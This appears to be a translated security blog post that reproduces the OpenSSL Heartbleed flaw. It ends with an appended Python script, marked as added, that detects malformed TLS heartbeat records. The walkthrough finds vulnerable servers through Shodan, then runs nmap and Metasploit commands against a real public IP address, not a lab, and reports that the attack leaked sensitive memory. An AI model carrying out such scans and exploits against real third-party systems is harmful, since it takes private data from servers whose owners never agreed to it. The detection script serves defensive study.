Reproducing the OpenSSL 1.0.1 Heartbleed vulnerability – Author: 抽华子的灰鹿

First, use Shodan to search for hosts.
The search query format is:
openssl 1.0.1a
Then pick any host that returns a 200 response and run a vulnerability scan against it.
I. Scanning with a dedicated tool
This host turned out to have nothing exploitable.
We need to switch to another one:
149.202.69.214
This one turned out to be exploitable.
II. Scanning with nmap
nmap -sV -p 443 149.202.69.214 --script=ssl-heartbleed.nse
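The output reports the vulnerability identifier at the bottom.
With discovery complete, the next step is exploitation.
Open msf.
Then search for modules related to Heartbleed: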
search heartbleed
We select the first one:
use auxiliary/scanner/ssl/openssl_heartbleed
Next, check which options need to be set.
set rhosts 149.202.69.214
The port (443) is already filled in, so it does not need to be set again.
set VERBOSE true
Execute run; it returns a lot of sensitive information.
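A detection-side check for the traffic this module generates, as an added example that is not part of the original post: it parses unencrypted TLS records and flags heartbeat messages whose declared payload length cannot fit in the record, which RFC 6520 requires receivers to discard. The sample byte strings are constructed, the function names are this example's own, and it assumes the heartbeat is sent in cleartext (before the handshake finishes).

```python
import struct

TLS_HEARTBEAT = 24          # TLS record content type (RFC 6520)
HB_REQUEST = 1              # heartbeat_request message type
MIN_PADDING = 16            # RFC 6520 minimum padding length

def iter_records(stream: bytes):
    """Yield (content_type, fragment) for each complete TLS record."""
    off = 0
    while off + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from("!BHH", stream, off)
        fragment = stream[off + 5: off + 5 + length]
        if len(fragment) < length:      # truncated capture, stop parsing
            return
        yield ctype, fragment
        off += 5 + length

def check_heartbeat(fragment: bytes):
    """Return a finding string for a malformed heartbeat, else None."""
    if len(fragment) < 3:
        return "heartbeat shorter than its 3-byte header"
    hb_type, claimed = struct.unpack_from("!BH", fragment, 0)
    # type(1) + payload_length(2) + payload + padding(>=16) must fit.
    if 3 + claimed + MIN_PADDING > len(fragment):
        kind = "request" if hb_type == HB_REQUEST else "message"
        return (f"heartbeat {kind} claims {claimed}-byte payload "
                f"but record holds {len(fragment)} bytes")
    return None

def scan(stream: bytes):
    """Collect findings for every cleartext heartbeat record in a stream."""
    findings = []
    for ctype, fragment in iter_records(stream):
        if ctype == TLS_HEARTBEAT:
            finding = check_heartbeat(fragment)
            if finding:
                findings.append(finding)
    return findings

def record(ctype: int, fragment: bytes) -> bytes:
    """Wrap a fragment in a TLS 1.1 record header (for the samples below)."""
    return struct.pack("!BHH", ctype, 0x0302, len(fragment)) + fragment

# Constructed samples: a well-formed heartbeat and one over-claiming its length.
GOOD = record(24, struct.pack("!BH", 1, 4) + b"ping" + b"\x00" * 16)
BAD = record(24, struct.pack("!BH", 1, 0x4000))

if __name__ == "__main__":
    print("\n".join(scan(GOOD + BAD)))
```

The same length comparison is what a patched server applies before answering, so a finding here means the peer sent a message that a compliant endpoint would silently drop.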

Source: freebuf.com 2021-01-06 22:00:31 by: 抽华子的灰鹿
